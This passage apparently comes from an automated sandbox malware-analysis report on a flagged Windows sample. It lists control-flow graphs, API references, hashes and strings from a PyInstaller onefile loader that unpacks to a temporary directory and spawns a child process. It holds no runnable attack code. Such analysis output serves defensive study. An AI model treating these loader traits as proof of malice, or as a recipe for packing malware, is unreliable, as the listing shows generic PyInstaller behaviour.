                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                    • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                    • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                    • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                    • Instruction ID: cb507049de633456afe1f32bf99a2bb64d7ed7002b7c7c3c0bbf6689f7aa8371
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DD1C731A0AA8285E712AF38E8542ABB760FF66758F840139DB5D876ACEF7CD144C710
                                                                                                                                                                                                                                    Function 00007FF7B2B61000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 62 7ff7b2b61000-7ff7b2b63806 call 7ff7b2b6fe18 call 7ff7b2b6fe20 call 7ff7b2b6c850 call 7ff7b2b753f0 call 7ff7b2b75484 call 7ff7b2b636b0 76 7ff7b2b63808-7ff7b2b6380f 62->76 77 7ff7b2b63814-7ff7b2b63836 call 7ff7b2b61950 62->77 78 7ff7b2b63c97-7ff7b2b63cb2 call 7ff7b2b6c550 76->78 82 7ff7b2b6383c-7ff7b2b63856 call 7ff7b2b61c80 77->82 83 7ff7b2b6391b-7ff7b2b63931 call 7ff7b2b645c0 77->83 87 7ff7b2b6385b-7ff7b2b6389b call 7ff7b2b68830 82->87 90 7ff7b2b6396a-7ff7b2b6397f call 7ff7b2b62710 83->90 91 7ff7b2b63933-7ff7b2b63960 call 7ff7b2b67f90 83->91 96 7ff7b2b6389d-7ff7b2b638a3 87->96 97 7ff7b2b638c1-7ff7b2b638cc call 7ff7b2b74f30 87->97 101 7ff7b2b63c8f 90->101 99 7ff7b2b63984-7ff7b2b639a6 call 7ff7b2b61c80 91->99 100 7ff7b2b63962-7ff7b2b63965 call 7ff7b2b7004c 91->100 102 7ff7b2b638a5-7ff7b2b638ad 96->102 103 7ff7b2b638af-7ff7b2b638bd call 7ff7b2b689a0 96->103 109 7ff7b2b639fc-7ff7b2b63a2a call 7ff7b2b68940 call 7ff7b2b689a0 * 3 97->109 110 7ff7b2b638d2-7ff7b2b638e1 call 7ff7b2b68830 97->110 115 7ff7b2b639b0-7ff7b2b639b9 99->115 100->90 101->78 102->103 103->97 138 7ff7b2b63a2f-7ff7b2b63a3e call 7ff7b2b68830 109->138 119 7ff7b2b638e7-7ff7b2b638ed 110->119 120 7ff7b2b639f4-7ff7b2b639f7 call 7ff7b2b74f30 110->120 115->115 118 7ff7b2b639bb-7ff7b2b639d8 call 7ff7b2b61950 115->118 118->87 130 7ff7b2b639de-7ff7b2b639ef call 7ff7b2b62710 118->130 124 7ff7b2b638f0-7ff7b2b638fc 119->124 120->109 127 7ff7b2b638fe-7ff7b2b63903 124->127 128 7ff7b2b63905-7ff7b2b63908 124->128 127->124 127->128 128->120 131 7ff7b2b6390e-7ff7b2b63916 call 7ff7b2b74f30 128->131 130->101 131->138 141 7ff7b2b63a44-7ff7b2b63a47 138->141 142 7ff7b2b63b45-7ff7b2b63b53 138->142 141->142 145 7ff7b2b63a4d-7ff7b2b63a50 141->145 143 7ff7b2b63a67 142->143 144 7ff7b2b63b59-7ff7b2b63b5d 142->144 146 7ff7b2b63a6b-7ff7b2b63a90 call 7ff7b2b74f30 143->146 144->146 147 7ff7b2b63b14-7ff7b2b63b17 145->147 148 7ff7b2b63a56-7ff7b2b63a5a 145->148 157 7ff7b2b63aab-7ff7b2b63ac0 146->157 158 7ff7b2b63a92-7ff7b2b63aa6 call 7ff7b2b68940 146->158 149 7ff7b2b63b19-7ff7b2b63b1d 147->149 150 7ff7b2b63b2f-7ff7b2b63b40 call 7ff7b2b62710 147->150 148->147 152 7ff7b2b63a60 148->152 149->150 153 7ff7b2b63b1f-7ff7b2b63b2a 149->153 159 7ff7b2b63c7f-7ff7b2b63c87 150->159 152->143 153->146 161 7ff7b2b63be8-7ff7b2b63bfa call 7ff7b2b68830 157->161 162 7ff7b2b63ac6-7ff7b2b63aca 157->162 158->157 159->101 170 7ff7b2b63bfc-7ff7b2b63c02 161->170 171 7ff7b2b63c2e 161->171 164 7ff7b2b63bcd-7ff7b2b63be2 call 7ff7b2b61940 162->164 165 7ff7b2b63ad0-7ff7b2b63ae8 call 7ff7b2b75250 162->165 164->161 164->162 175 7ff7b2b63aea-7ff7b2b63b02 call 7ff7b2b75250 165->175 176 7ff7b2b63b62-7ff7b2b63b7a call 7ff7b2b75250 165->176 173 7ff7b2b63c1e-7ff7b2b63c2c 170->173 174 7ff7b2b63c04-7ff7b2b63c1c 170->174 177 7ff7b2b63c31-7ff7b2b63c40 call 7ff7b2b74f30 171->177 173->177 174->177 175->164 188 7ff7b2b63b08-7ff7b2b63b0f 175->188 186 7ff7b2b63b7c-7ff7b2b63b80 176->186 187 7ff7b2b63b87-7ff7b2b63b9f call 7ff7b2b75250 176->187 184 7ff7b2b63c46-7ff7b2b63c4a 177->184 185 7ff7b2b63d41-7ff7b2b63d63 call 7ff7b2b644e0 177->185 189 7ff7b2b63cd4-7ff7b2b63ce6 call 7ff7b2b68830 184->189 190 7ff7b2b63c50-7ff7b2b63c5f call 7ff7b2b690e0 184->190 199 7ff7b2b63d65-7ff7b2b63d6f call 7ff7b2b64630 185->199 200 7ff7b2b63d71-7ff7b2b63d82 call 7ff7b2b61c80 185->200 186->187 201 7ff7b2b63bac-7ff7b2b63bc4 call 7ff7b2b75250 187->201 202 7ff7b2b63ba1-7ff7b2b63ba5 187->202 188->164 206 7ff7b2b63ce8-7ff7b2b63ceb 189->206 207 7ff7b2b63d35-7ff7b2b63d3c 189->207 204 7ff7b2b63cb3-7ff7b2b63cb6 call 7ff7b2b68660 190->204 205 7ff7b2b63c61 190->205 214 7ff7b2b63d87-7ff7b2b63d96 199->214 200->214 201->164 216 7ff7b2b63bc6 201->216 202->201 221 7ff7b2b63cbb-7ff7b2b63cbd 204->221 211 7ff7b2b63c68 call 7ff7b2b62710 205->211 206->207 212 7ff7b2b63ced-7ff7b2b63d10 call 7ff7b2b61c80 206->212 207->211 224 7ff7b2b63c6d-7ff7b2b63c77 211->224 229 7ff7b2b63d2b-7ff7b2b63d33 call 7ff7b2b74f30 212->229 230 7ff7b2b63d12-7ff7b2b63d26 call 7ff7b2b62710 call 7ff7b2b74f30 212->230 219 7ff7b2b63d98-7ff7b2b63d9f 214->219 220 7ff7b2b63dc4-7ff7b2b63dda call 7ff7b2b69390 214->220 216->164 219->220 226 7ff7b2b63da1-7ff7b2b63da5 219->226 232 7ff7b2b63ddc 220->232 233 7ff7b2b63de8-7ff7b2b63e04 SetDllDirectoryW 220->233 222 7ff7b2b63cc8-7ff7b2b63ccf 221->222 223 7ff7b2b63cbf-7ff7b2b63cc6 221->223 222->214 223->211 224->159 226->220 231 7ff7b2b63da7-7ff7b2b63dbe SetDllDirectoryW LoadLibraryExW 226->231 229->214 230->224 231->220 232->233 237 7ff7b2b63e0a-7ff7b2b63e19 call 7ff7b2b68830 233->237 238 7ff7b2b63f01-7ff7b2b63f08 233->238 251 7ff7b2b63e1b-7ff7b2b63e21 237->251 252 7ff7b2b63e32-7ff7b2b63e3c call 7ff7b2b74f30 237->252 242 7ff7b2b63f0e-7ff7b2b63f15 238->242 243 7ff7b2b64008-7ff7b2b64010 238->243 242->243 244 7ff7b2b63f1b-7ff7b2b63f25 call 7ff7b2b633c0 242->244 245 7ff7b2b64035-7ff7b2b64067 call 7ff7b2b636a0 call 7ff7b2b63360 call 7ff7b2b63670 call 7ff7b2b66fc0 call 7ff7b2b66d70 243->245 246 7ff7b2b64012-7ff7b2b6402f PostMessageW GetMessageW 243->246 244->224 258 7ff7b2b63f2b-7ff7b2b63f3f call 7ff7b2b690c0 244->258 246->245 255 7ff7b2b63e2d-7ff7b2b63e2f 251->255 256 7ff7b2b63e23-7ff7b2b63e2b 251->256 263 7ff7b2b63ef2-7ff7b2b63efc call 7ff7b2b68940 252->263 264 7ff7b2b63e42-7ff7b2b63e48 252->264 255->252 256->255 269 7ff7b2b63f64-7ff7b2b63fa0 call 7ff7b2b68940 call 7ff7b2b689e0 call 7ff7b2b66fc0 call 7ff7b2b66d70 call 7ff7b2b688e0 258->269 270 7ff7b2b63f41-7ff7b2b63f5e PostMessageW GetMessageW 258->270 263->238 264->263 268 7ff7b2b63e4e-7ff7b2b63e54 264->268 272 7ff7b2b63e56-7ff7b2b63e58 268->272 273 7ff7b2b63e5f-7ff7b2b63e61 268->273 306 7ff7b2b63fa5-7ff7b2b63fa7 269->306 270->269 274 7ff7b2b63e67-7ff7b2b63e83 call 7ff7b2b66dc0 call 7ff7b2b67340 272->274 275 7ff7b2b63e5a 272->275 273->238 273->274 289 7ff7b2b63e8e-7ff7b2b63e95 274->289 290 7ff7b2b63e85-7ff7b2b63e8c 274->290 275->238 293 7ff7b2b63e97-7ff7b2b63ea4 call 7ff7b2b66e00 289->293 294 7ff7b2b63eaf-7ff7b2b63eb9 call 7ff7b2b671b0 289->294 292 7ff7b2b63edb-7ff7b2b63ef0 call 7ff7b2b62a50 call 7ff7b2b66fc0 call 7ff7b2b66d70 290->292 292->238 293->294 308 7ff7b2b63ea6-7ff7b2b63ead 293->308 304 7ff7b2b63ebb-7ff7b2b63ec2 294->304 305 7ff7b2b63ec4-7ff7b2b63ed2 call 7ff7b2b674f0 294->305 304->292 305->238 318 7ff7b2b63ed4 305->318 310 7ff7b2b63fa9-7ff7b2b63fbf call 7ff7b2b68ed0 call 7ff7b2b688e0 306->310 311 7ff7b2b63ff5-7ff7b2b64003 call 7ff7b2b61900 306->311 308->292 310->311 323 7ff7b2b63fc1-7ff7b2b63fd6 310->323 311->224 318->292 324 7ff7b2b63fd8-7ff7b2b63feb call 7ff7b2b62710 call 7ff7b2b61900 323->324 325 7ff7b2b63ff0 call 7ff7b2b62a50 323->325 324->224 325->311
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                    • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                    • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                    • Opcode ID: bfe24250e6e030a5c654557d1e02b7c570d566d746dc6ea7508ff042bae04871
                                                                                                                                                                                                                                    • Instruction ID: 5369ba84b5ec896d6659514cd31c37792b2bf0098ce807c961b8f287616f1c2d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfe24250e6e030a5c654557d1e02b7c570d566d746dc6ea7508ff042bae04871
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8132B222A0A68250FB1BB72C94543BBE651AF67B40FC44036DB5D862DEFFACE454C325
                                                                                                                                                                                                                                    Function 00007FF7B2B85C00 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 479 7ff7b2b85c00-7ff7b2b85c3b call 7ff7b2b85588 call 7ff7b2b85590 call 7ff7b2b855f8 486 7ff7b2b85e65-7ff7b2b85eb1 call 7ff7b2b7a900 call 7ff7b2b85588 call 7ff7b2b85590 call 7ff7b2b855f8 479->486 487 7ff7b2b85c41-7ff7b2b85c4c call 7ff7b2b85598 479->487 513 7ff7b2b85eb7-7ff7b2b85ec2 call 7ff7b2b85598 486->513 514 7ff7b2b85fef-7ff7b2b8605d call 7ff7b2b7a900 call 7ff7b2b81578 486->514 487->486 492 7ff7b2b85c52-7ff7b2b85c5c 487->492 494 7ff7b2b85c7e-7ff7b2b85c82 492->494 495 7ff7b2b85c5e-7ff7b2b85c61 492->495 498 7ff7b2b85c85-7ff7b2b85c8d 494->498 497 7ff7b2b85c64-7ff7b2b85c6f 495->497 501 7ff7b2b85c7a-7ff7b2b85c7c 497->501 502 7ff7b2b85c71-7ff7b2b85c78 497->502 498->498 503 7ff7b2b85c8f-7ff7b2b85ca2 call 7ff7b2b7d5fc 498->503 501->494 506 7ff7b2b85cab-7ff7b2b85cb9 501->506 502->497 502->501 509 7ff7b2b85cba-7ff7b2b85cc6 call 7ff7b2b7a948 503->509 510 7ff7b2b85ca4-7ff7b2b85ca6 call 7ff7b2b7a948 503->510 520 7ff7b2b85ccd-7ff7b2b85cd5 509->520 510->506 513->514 522 7ff7b2b85ec8-7ff7b2b85ed3 call 7ff7b2b855c8 513->522 533 7ff7b2b8606b-7ff7b2b8606e 514->533 534 7ff7b2b8605f-7ff7b2b86066 514->534 520->520 523 7ff7b2b85cd7-7ff7b2b85ce8 call 7ff7b2b80474 520->523 522->514 531 7ff7b2b85ed9-7ff7b2b85efc call 7ff7b2b7a948 GetTimeZoneInformation 522->531 523->486 532 7ff7b2b85cee-7ff7b2b85d44 call 7ff7b2b8a4d0 * 4 call 7ff7b2b85b1c 523->532 549 7ff7b2b85fc4-7ff7b2b85fee call 7ff7b2b85580 call 7ff7b2b85570 call 7ff7b2b85578 531->549 550 7ff7b2b85f02-7ff7b2b85f23 531->550 591 7ff7b2b85d46-7ff7b2b85d4a 532->591 535 7ff7b2b860a5-7ff7b2b860b8 call 7ff7b2b7d5fc 533->535 536 7ff7b2b86070 533->536 539 7ff7b2b860fb-7ff7b2b860fe 534->539 555 7ff7b2b860ba 535->555 556 7ff7b2b860c3-7ff7b2b860de call 7ff7b2b81578 535->556 542 7ff7b2b86073 536->542 541 7ff7b2b86104-7ff7b2b8610c call 7ff7b2b85c00 539->541 539->542 547 7ff7b2b86078-7ff7b2b860a4 call 7ff7b2b7a948 call 7ff7b2b6c550 541->547 542->547 548 7ff7b2b86073 call 7ff7b2b85e7c 542->548 548->547 558 7ff7b2b85f2e-7ff7b2b85f35 550->558 559 7ff7b2b85f25-7ff7b2b85f2b 550->559 565 7ff7b2b860bc-7ff7b2b860c1 call 7ff7b2b7a948 555->565 579 7ff7b2b860e5-7ff7b2b860f7 call 7ff7b2b7a948 556->579 580 7ff7b2b860e0-7ff7b2b860e3 556->580 560 7ff7b2b85f49 558->560 561 7ff7b2b85f37-7ff7b2b85f3f 558->561 559->558 570 7ff7b2b85f4b-7ff7b2b85fbf call 7ff7b2b8a4d0 * 4 call 7ff7b2b82b5c call 7ff7b2b86114 * 2 560->570 561->560 567 7ff7b2b85f41-7ff7b2b85f47 561->567 565->536 567->570 570->549 579->539 580->565 593 7ff7b2b85d4c 591->593 594 7ff7b2b85d50-7ff7b2b85d54 591->594 593->594 594->591 596 7ff7b2b85d56-7ff7b2b85d7b call 7ff7b2b76b58 594->596 602 7ff7b2b85d7e-7ff7b2b85d82 596->602 604 7ff7b2b85d84-7ff7b2b85d8f 602->604 605 7ff7b2b85d91-7ff7b2b85d95 602->605 604->605 607 7ff7b2b85d97-7ff7b2b85d9b 604->607 605->602 610 7ff7b2b85d9d-7ff7b2b85dc5 call 7ff7b2b76b58 607->610 611 7ff7b2b85e1c-7ff7b2b85e20 607->611 619 7ff7b2b85dc7 610->619 620 7ff7b2b85de3-7ff7b2b85de7 610->620 613 7ff7b2b85e27-7ff7b2b85e34 611->613 614 7ff7b2b85e22-7ff7b2b85e24 611->614 615 7ff7b2b85e36-7ff7b2b85e4c call 7ff7b2b85b1c 613->615 616 7ff7b2b85e4f-7ff7b2b85e5e call 7ff7b2b85580 call 7ff7b2b85570 613->616 614->613 615->616 616->486 623 7ff7b2b85dca-7ff7b2b85dd1 619->623 620->611 625 7ff7b2b85de9-7ff7b2b85e07 call 7ff7b2b76b58 620->625 623->620 626 7ff7b2b85dd3-7ff7b2b85de1 623->626 631 7ff7b2b85e13-7ff7b2b85e1a 625->631 626->620 626->623 631->611 632 7ff7b2b85e09-7ff7b2b85e0d 631->632 632->611 633 7ff7b2b85e0f 632->633 633->631
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7B2B85C45
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B85598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B855AC
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A95E
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A948: GetLastError.KERNEL32(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A968
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7B2B7A8DF,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7A909
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7B2B7A8DF,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7A92E
                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7B2B85C34
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B8560C
                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7B2B85EAA
                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7B2B85EBB
                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7B2B85ECC
                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7B2B8610C), ref: 00007FF7B2B85EF3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                    • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                    • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                    • Instruction ID: 080ee76178d6f77bf67e634cb9a1fc5aca53e6555820f28d494afc84c43a14ac
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BD11722A1A24245E722BF29C4445BBE791EF66784FC58039DB4D4B69EFFBCE441C720
                                                                                                                                                                                                                                    Function 00007FF7B2B86964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 693 7ff7b2b86964-7ff7b2b869d7 call 7ff7b2b86698 696 7ff7b2b869d9-7ff7b2b869e2 call 7ff7b2b74ee8 693->696 697 7ff7b2b869f1-7ff7b2b869fb call 7ff7b2b78520 693->697 704 7ff7b2b869e5-7ff7b2b869ec call 7ff7b2b74f08 696->704 702 7ff7b2b869fd-7ff7b2b86a14 call 7ff7b2b74ee8 call 7ff7b2b74f08 697->702 703 7ff7b2b86a16-7ff7b2b86a7f CreateFileW 697->703 702->704 706 7ff7b2b86afc-7ff7b2b86b07 GetFileType 703->706 707 7ff7b2b86a81-7ff7b2b86a87 703->707 720 7ff7b2b86d32-7ff7b2b86d52 704->720 713 7ff7b2b86b5a-7ff7b2b86b61 706->713 714 7ff7b2b86b09-7ff7b2b86b44 GetLastError call 7ff7b2b74e7c CloseHandle 706->714 710 7ff7b2b86ac9-7ff7b2b86af7 GetLastError call 7ff7b2b74e7c 707->710 711 7ff7b2b86a89-7ff7b2b86a8d 707->711 710->704 711->710 718 7ff7b2b86a8f-7ff7b2b86ac7 CreateFileW 711->718 716 7ff7b2b86b69-7ff7b2b86b6c 713->716 717 7ff7b2b86b63-7ff7b2b86b67 713->717 714->704 727 7ff7b2b86b4a-7ff7b2b86b55 call 7ff7b2b74f08 714->727 724 7ff7b2b86b72-7ff7b2b86bc7 call 7ff7b2b78438 716->724 725 7ff7b2b86b6e 716->725 717->724 718->706 718->710 732 7ff7b2b86bc9-7ff7b2b86bd5 call 7ff7b2b868a0 724->732 733 7ff7b2b86be6-7ff7b2b86c17 call 7ff7b2b86418 724->733 725->724 727->704 732->733 740 7ff7b2b86bd7 732->740 738 7ff7b2b86c1d-7ff7b2b86c5f 733->738 739 7ff7b2b86c19-7ff7b2b86c1b 733->739 742 7ff7b2b86c81-7ff7b2b86c8c 738->742 743 7ff7b2b86c61-7ff7b2b86c65 738->743 741 7ff7b2b86bd9-7ff7b2b86be1 call 7ff7b2b7aac0 739->741 740->741 741->720 746 7ff7b2b86c92-7ff7b2b86c96 742->746 747 7ff7b2b86d30 742->747 743->742 745 7ff7b2b86c67-7ff7b2b86c7c 743->745 745->742 746->747 749 7ff7b2b86c9c-7ff7b2b86ce1 CloseHandle CreateFileW 746->749 747->720 750 7ff7b2b86d16-7ff7b2b86d2b 749->750 751 7ff7b2b86ce3-7ff7b2b86d11 GetLastError call 7ff7b2b74e7c call 7ff7b2b78660 749->751 750->747 751->750
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1617910340-0
                                                                                                                                                                                                                                    • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                    • Instruction ID: 264b094f57909c2bb1460f428ca1dd434130a52c72b27f80e3a9f5a970c7b9ed
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09C1F232B25A4185EB15EF68C0852AE7771F75AB98B410239DB2E9B7E8EF78D051C310
                                                                                                                                                                                                                                    Function 00007FF7B2B683C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B6842B
                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684AE
                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684CD
                                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684DB
                                                                                                                                                                                                                                    • FindClose.KERNEL32(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684EC
                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNELBASE(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684F5
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
